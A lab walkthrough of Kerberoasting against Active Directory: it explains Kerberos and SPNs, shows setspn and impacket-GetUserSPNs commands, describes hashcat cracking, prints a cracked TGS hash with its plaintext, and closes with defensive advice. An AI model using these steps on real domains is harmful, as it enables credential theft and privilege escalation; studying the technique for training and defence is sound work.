Kerberoasting Attack

tags: AD ActiveDirectory Hashcat Impacket Kerberos TGT TGS Kerberoasting

What is Kerberos? 🐕‍🦺

Kerberos is an authentication protocol used to verify the identity of a user or host. It's designed to provide secure authentication over an insecure network.

What is a SPN?

A service principal name (SPN) is a unique identifier of a service instace. SPNs are used by Kerberos to associate a service instance with a service logon account.

The structure of a SPN it's composed by 2 parts:
The Service type, like Web, File, SQL and the Host where the service is running, it is important to note that the host part must be written in FQDN and then write the port.

What is FQDN?

FQDN stands for Fully Qualified Domain Name and is simply the full domain name of a specific computer, or host.

What is the key distribution center for? 🧮

The KDC is implemented as a domain service. It uses the Active Directory as its account database and the Global Catalog for directing referrals to KDCs in other domains. The KDC is a single process that provides two services:

• Authentication Service (AS): This service issues ticket-granting tickets (TGTs) for connection to the ticket-granting service in its own domain or in any trusted domain. Before a client can ask for a ticket to another computer, it must request a TGT from the authentication service in the client's account domain. The authentication service returns a TGT for the ticket-granting service in the target computer's domain. The TGT can be reused until it expires, but the first access to any domain's ticket-granting service always requires a trip to the authentication service in the client's account domain.

• Ticket-Granting Service (TGS): This service issues tickets for connection to computers in its own domain. When clients want access to a computer, they contact the ticket-granting service in the target computer's domain, present a TGT, and ask for a ticket to the computer. The ticket can be reused until it expires, but the first access to any computer always requires a trip to the ticket-granting service in the target computer's account domain.

Authentication with Unconstrained Kerberos Delegation 🔐

Kerberos tickets represent the client's network credentials.

Clients obtain TIcket-Granting Ticket from the Authentication Service with the credentials in cache, and the AS check if user exists in DB, then if all its good the user receive the TGT and following this the user request a Ticket-Granting Service with the TGT recently obtained and it receive the TGS Response Service Ticket, then the user makes a request to the desired application including the TGS obtained from the Ticket-Granting Service and the Service Server grant access to the service with the user TGS.

How to Kerberoasting

Prerequisites ✔

• Domain user account with a SPN (Don't need elevated privileges, but i'm gonna add to domain admins to look a bad configuration in a real world.).
• Our Kali machine with tools as Impacket, Powersploit or Empire for automate the process, and some cracking tools like John the Ripper or hashcat.

Explanation 🗒

The Kerberoasting technique consist in requesting a TGS from the KDG that is associated with service accounts to obtain their hashes and then attempt to crack it offline with hashcat to obtain the password to move horizontally for access to other objects of the AD or escalate privileges to become a local administrator.

Setting up the environment 🔧

First, create a user account in your AD Lab to act like a service account, in this example we are gonna add to Domain Admin group because this is a common flaw in real environments and we set ip with a weak password like Mypassword1234€

Now to add a SPN to the account we are gonna go to a cmd and type this:

setspn -a ALPHA-DC/SQLService.ALPHA.local:60123 ALPHA\SQLService

This will asign the service account with a SPN, if we analyze in detail we have:

• setspn : The command describes itself

• -a : The flag to indicate the FQDN(Fully Qualified Domain Name)

• FQDN & the port we want

• The Netbios name.

To check if it worked we have to type this command:

setspn -T ALPHA.local -Q */*

With this configured, now it's time to start the attack.

Kerberoasting attack process 🔥

The first step is enumerate the SPNs so we are gonna use impacket-GetUserSPNs to do this.
Remember we need user account credentials to do it remotely, and the ip of the Domain Controller.

The command and the response will look something like this:

impacket-GetUserSPNs -dc-ip 192.168.1.200 ALPHA.local/amason:Ba66age0

First goes the command, next the flag with the ip, then the domain name and the user with the colon and the password of the user.

Now, if we add the flag -request we receive the hash of the TGS and now you can crack it on hashcat or john, in my case I prefer hashcat so let's show the command to crack this.

We have to copy the hash and save into a file called krbhash.

In my case I gonna use a dictionary, because this is a lab and I know the password.

With this command we select the type of hash, in this case TGS-REP, the mode: straight, the hash file and the dictionary file.

In my case i dont have the drivers well installed so y use the –force flag to start cracking anyways.

When hashcat finishes it return something like this.

$krb5tgs

$23$SQLService

$ALPHA.LOCAL$ALPHA.local/SQLService$6cf105cf6a98a8f70896fe839f992bb4$92e58ac16d8ef5268b7109438c51a8ce6257916889e801dcbe4ddcca64a8138b58c9a54230a9008e9aba25f40ee6ac827680061b57e1c3325debea6f3bfdeee32b850306f0b728b905a94c2b298d2d9e4ff724a4eb5acc97aac553641dce84c5360210871b22de9791069aecf295fa9d93d1edb2bae16f61b62b26f1a4465628b6f96a479ff6b4e45c291e8f5b2cd299b73a661d6043a371016f91952ec3047fb5b4e72589b211c1a1b4bbf70caa7adfbe35de7ec39900e21b8854725af1cc4a2c36213893a0a06506e6518c2c8b225dbafe264d6c93d4ee53b1fba811291f733e61642be00078c2e33e982b83b4bea3f6790ea5d6decd7d2002631c43b23e4b2686d85ddc84f35ad08c03ecc5e0d1e0cefe2754020aca53de841dbb4ae58bccaf2c4baa3741bbd826fcb2f8e2e7a710c16009155d5a3293cd74a25348381fd2f9c765e307e4ebf61a145fa49e8f8cd2d900e0a5266cff0cc978eaa4480b63ef6596e9a62319f58b8513b305a386e26208f278302f06e4dbbc8fa28bb599d9dc71f527813216d65e51f7f2143c04b26908466aaff936b8ed7e871e023dfa983b10f81541ff626120ce45d987ef7e20b0af2875647d3ad786e3bf8126b4551164f082439d795f0d455696503c4039935b3131cefe56c5f98060e762754122bf0f61df0e41503002931267fd3ac4cd3260e85f7798a278f6530c1974d72b5b6ef29150a1fa27a3725a7b05e12d4f2730e350d73de49b33b0f17db4d10f1213e5846051cfa6dba3bb65d4139e7f1bec67710deb6188272866d4b96a38fe85b885ccb15c1ab3c43efe80fb2e1ee0ba13187579a6b84e10acc0d3d4cdbd1e687b051483de7306a31a07d4b8eb1b717db46128856a4569f1bcb8a0b1fb506230d79af4f25ca8138b4c92134a2aabeaf295e8bf19d223ed3a894f4d623ddedc6df071a395d43d699d2bb1dc38d022ecf0f25819a7c5136ff5d221bbb8b061e1c96cec127159b3f3f7485a6f67c71076c162714d8350404a4eb3d2703d07d8549e34baae5061e71f78f132a53a30efbd608911ad1420b585c5ff5f38b7655107aedd24e378a412f9a4a23fe207cf4df4a8534486718a501a43f743c6d73b9b664f14fac1d2438ad908a5b57b29fb38e41c66999758ffc448979efe839d1804871b7d9a12238ce3cd9ece16d57e7acda0ae84a644d6e111953e14dfe651cdb1c21bdff4738dc247b0d3b0de5f6f3412c92a938515b753799d06a2918ab725a21863e551d0dbb8d2c374b1ba41918ddb08b061cdb06eae12e44bde3580b1f2:Mypassword1234€

Conclusions

Now we know the password and we can have remote access to the network as this user and access to the system, and if we remember this service account has Domain Admin Privileges and with this we have access to this Domain and start other attacks. So now we know that it is important to change the credentials of the accounts from time to time as well as enforce them, and never add the service accounts to the Domain Admins group and always have them with the minimum necessary permissions because we now know that they are susceptible to kerberoasting.